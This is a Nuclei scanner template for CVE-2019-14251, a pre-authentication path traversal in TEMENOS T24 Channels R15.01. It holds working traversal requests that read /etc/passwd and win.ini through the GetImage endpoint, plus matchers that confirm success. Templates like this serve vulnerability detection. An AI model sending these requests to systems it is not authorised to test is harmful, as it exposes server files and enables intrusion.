nuclei-templates/cves/2019/CVE-2019-14251.yaml

37 lines
1.0 KiB
YAML

id: CVE-2019-14251
info:
name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal
author: 0x_Akoko
severity: high
description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server.
reference:
- https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
- https://www.cvedetails.com/cve/CVE-2019-14251
- https://vuldb.com/?id.146815
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-14251
cwe-id: CWE-22
tags: cve,cve2019,temenos,lfi,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd"
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: status
status:
- 200